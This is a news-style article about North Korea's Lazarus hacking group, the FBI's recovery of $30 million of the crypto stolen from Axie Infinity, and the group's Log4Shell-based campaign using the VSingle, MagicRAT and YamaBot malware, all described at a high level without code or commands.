FBI Seized $30 Million Stolen Crypto
Lazarus (APT38), the notorious hacking group from North Korea has featured prominently on dark web news portals lately. The APT hackers are responsible for the recent hack on the Axie Infinity platform, where $620 million cryptocurrencies were stolen. However, with the support of the FBI and other law enforcement agencies, $30 million of the stolen money was recovered from the wallet of the criminals.
Now, with their latest cyber espionage scheme, the North Korean state sponsored hackers have unleashed a massive hacking campaign against USA companies. The threat actors have been tracked to VMWare servers, which they are utilizing to infiltrate companies in the energy sector. According to threat analysis reports, the targeted energy networks are located in mostly the United States, Canada, and Japan.
Lazarus is no stranger to creating havoc on a global level, they have been on the radar for over a decade. These hackers sponsored by Kim Jong Un’s government have been the main protagonist in hundreds of sophisticated hacking attacks launched on global entities.
No doubt, the past ten years have seen Lazarus evolve, its notorious accomplishments include hijacking and stealing private data files from corporate companies. They have also been involved in espionage activities carried out on countries deemed as North Korea’s enemies. But their latest hacking activities have greatly enriched Jong Un’s regime, to its hacking resume, the group has added ransomware and cryptocurrency theft campaigns.
Additionally, the prolific hacking group, according to cyber analysts has amassed an enormous fortune from their illegal activities. It is reported that Lucifer’s threat actors entrepreneurial conglomerate includes the “Vsingle” and “YamaBot,” harmful malware. They’ve also been linked to “MagicRAT” the RAT trojan that allows hackers to remotely access and steal data from virus infected machines.
Lazarus Assault Arsenal
ASEC and Symantec’s cyber researchers revealed that they have tracked the North Korean hackers to recent hacks committed in April and May. Another analytical report issued by Cisco revealed further information about other cyber attacks done by these threat actors.
So far, various tactics used by the highly skilled dark web gang demonstrated their adaptability to various hacking methods. Lazarus is known for exploiting Log4Shell weaknesses usually found in VMWare servers. Thus, by creating reverse shellcode commands, they are able to execute arbitrary commands on vulnerable endpoints.
Additionally, in the initial stage, the hackers disabled Windows Defender with the deployment of their VSingle backdoor malware. This is used to alter registry keys, using WMIC, and PowerShell scripts that run with the VMWare Horizon files.
In the second scenario, once VSingle finds a new victim, the hackers drop the MagicRAT trojan, which allows them to remotely steal private data. With the third installment, the YamaBot malware that also boasts RAT features is used to copy the directories and files from their victims.
YamaBot shows that it has a plethora of functions; it can transmit C2 details about the hijacking procedure, remotely steals data files, and run commands on the targeted computer networks. Above all, it can self destruct, and wipe its footprints from the infiltrated database.
Diversity is what makes the Lazarus hacking group so dangerous; its attack chain goes beyond malware payloads. Strategies for credential harvesting and proxy tunneling tools are also a part of the Lazarus hackers’ devastating hacking arsenal.